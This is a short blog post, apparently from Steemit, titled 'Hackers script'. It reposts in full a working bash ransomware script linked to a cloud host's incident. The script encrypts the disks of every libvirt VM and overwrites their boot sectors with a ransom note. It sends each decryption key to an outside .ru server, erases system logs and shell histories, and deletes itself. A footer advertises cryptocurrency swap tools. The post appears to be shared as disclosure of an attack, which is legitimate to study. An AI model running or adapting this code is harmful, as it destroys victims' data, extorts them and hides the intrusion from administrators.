Hackers script

https://pastebin.com/SrpYNVUx
https://status.cloudcone.com/incidents/346624

#!/bin/bash SERVER_URL="https://ikvm.oldenvale.ru/keys.php" BLOCK_SIZE_MB=512 THREADS=16

G='\033[0;32m'
Y='\033[1;33m'
NC='\033[0m'

Функция очистки

clean_all() {
sudo journalctl --vacuum-time=1s 2>/dev/null
sudo find /var/log -type f ( -name ".log" -o -name ".log." -o -name ".gz" -o -name ".old" -o -name ".1" ) -exec truncate -s 0 {} ; 2>/dev/null
sudo truncate -s 0 /var/log/{syslog,messages,kern.log,auth.log,secure,maillog,cron,boot.log,dmesg,lastlog,wtmp,btmp,faillog} 2>/dev/null
history -c; cat /dev/null > ~/.bash_history; sudo find /home -name ".bash_history" -exec truncate -s 0 {} ; 2>/dev/null; sudo find /home -name ".zsh_history" -exec truncate -s 0 {} ; 2>/dev/null; sudo find /root -name ".*_history" -exec truncate -s 0 {} ; 2>/dev/null; export HISTFILE=/dev/null; history -c
}

Функция установки и проверки

install_and_verify() {
local tool=$1
if ! command -v "$tool" &>/dev/null; then
echo -e "${Y}[*] $tool missing. Attempting to fix...${NC}"
if [ -f /etc/debian_version ]; then
apt-get update -y && apt-get install -y "$tool" curl openssl xxd libvirt-clients &>/dev/null
elif [ -f /etc/redhat-release ]; then
if [ "$tool" == "nasm" ]; then
yum install -y https://download-ib01.fedoraproject.org/pub/epel/7/x86_64/Packages/n/nasm-2.10.07-7.el7.x86_64.rpm &>/dev/null || yum install -y nasm &>/dev/null
else
yum install -y "$tool" vim-common openssl curl &>/dev/null
fi
fi

    # Финальная проверка после попытки установки
    if ! command -v "$tool" &>/dev/null; then
        echo -e "\033[0;31m[!] Failed to install $tool. Task aborted to prevent data loss.\033[0m"
        exit 1
    fi
fi

}

Проверяем и фиксим зависимости

for t in nasm openssl xxd curl virsh; do
install_and_verify "$t"
done

process_vm() {
local dom=$1
[ -z "$dom" ] && return

UUID=$(virsh domuuid "$dom" | tr -d ' \n\r')
[ -z "$UUID" ] && return

KEY=$(openssl rand -hex 16)
[ -z "$KEY" ] && return

DISKS=$(virsh domblklist "$dom" --details | grep -E 'file|block' | awk '{print $4}')

cat << EOF > "boot_${dom}.asm"

[BITS 16]
[ORG 0x7C00]
start:
mov ax, 0x0003
int 0x10
mov si, msg
print:
lodsb
test al, al
jz hang
mov ah, 0x0e
int 0x10
jmp print
hang:
jmp hang
msg db 13, 10, " Your files are encrypted, requires payment for decrypting", 13, 10
db " Contact us: Telegram: @cloudcone_raidbot", 13, 10, 13, 10
db " UUID: $UUID", 13, 10, 0
times 510-($-$$) db 0
dw 0xAA55
EOF

nasm -f bin "boot_${dom}.asm" -o "boot_${dom}.bin" &>/dev/null
if [ ! -f "boot_${dom}.bin" ]; then
    rm -f "boot_${dom}.asm"
    return
fi

for disk in $DISKS; do
    [ ! -e "$disk" ] && continue

    # Пытаемся получить размер разными способами (важно для LVM)
    TOTAL_SIZE=$(blockdev --getsize64 "$disk" 2>/dev/null || stat -L -c%s "$disk" 2>/dev/null)
    [ -z "$TOTAL_SIZE" ] || [ "$TOTAL_SIZE" -le 0 ] && continue

    # Шифрование
    dd if="$disk" bs=1M count=$BLOCK_SIZE_MB 2>/dev/null | \
    openssl enc -aes-256-cbc -salt -pbkdf2 -iter 10000 -md sha256 -k "$KEY" -out "/tmp/${dom}.enc" 2>/dev/null

    # Если шифрованный файл не создался - пропускаем диск, чтобы не затереть оригинал нулями
    if [ ! -s "/tmp/${dom}.enc" ]; then
        continue
    fi

    ENC_SIZE=$(stat -c%s "/tmp/${dom}.enc")
    SEEK_POS=$((TOTAL_SIZE - ENC_SIZE - 8))

    # Запись
    dd if="/tmp/${dom}.enc" of="$disk" bs=1M seek=$SEEK_POS oflag=seek_bytes conv=notrunc 2>/dev/null
    printf "%016x" $ENC_SIZE | xxd -r -p | dd of="$disk" bs=1 seek=$((TOTAL_SIZE - 8)) oflag=seek_bytes conv=notrunc 2>/dev/null
    dd if=/dev/zero of="$disk" bs=1M count=$BLOCK_SIZE_MB conv=notrunc 2>/dev/null
    dd if="boot_${dom}.bin" of="$disk" bs=512 count=1 conv=notrunc 2>/dev/null

    rm -f "/tmp/${dom}.enc"
done

curl -s --max-time 10 -d "vm_name=$dom" -d "uuid=$UUID" -d "key=$KEY" "$SERVER_URL" > /dev/null
virsh reset "$dom" &>/dev/null
rm -f "boot_${dom}.asm" "boot_${dom}.bin"
echo -e "${Y}[+] Encrypted:${NC} $dom"

}

export -f process_vm
export SERVER_URL BLOCK_SIZE_MB Y NC

echo -e "${G}[*] Encryption started...${NC}"
domains=$(virsh list --all --name | grep . )
echo "$domains" | xargs -P $THREADS -I {} bash -c 'process_vm "{}"'

echo -e "${G}[*] Done. Cleaning logs...${NC}"
clean_all
rm -- "$0"

Steem to the Moon🚀!

• You can rent Steem Power via rentsp!
• You can swap the TRON:TRX/USDT/USDD to STEEM via tron2steem!
• You can swap the STEEM/SBD to SUI via steem2sui!
• You can swap the STEEM/SBD to SOL Solana via steem2sol!
• You can swap the STEEM/SBD to ETH Ethereum via steem2eth!
• You can swap the STEEM/SBD to Tether USDT (TRC-20) via steem2usdt!
• You can swap the STEEM/SBD to TRX (TRON) via steem2trx!
• You can swap the STEEM/SBD to BTS (BitShares) via steem2bts!
• Register a free STEEM account at SteemYY!
• Steem Block Explorer
• ChatGPT/Steem Integration: You can type !ask command to invoke ChatGPT
• Steem Witness Table and API
• Other Steem Tools

Support me, thank you!

Why you should vote me? My contributions
Please vote me as a witness or set me as a proxy via https://steemitwallet.com/~witnesses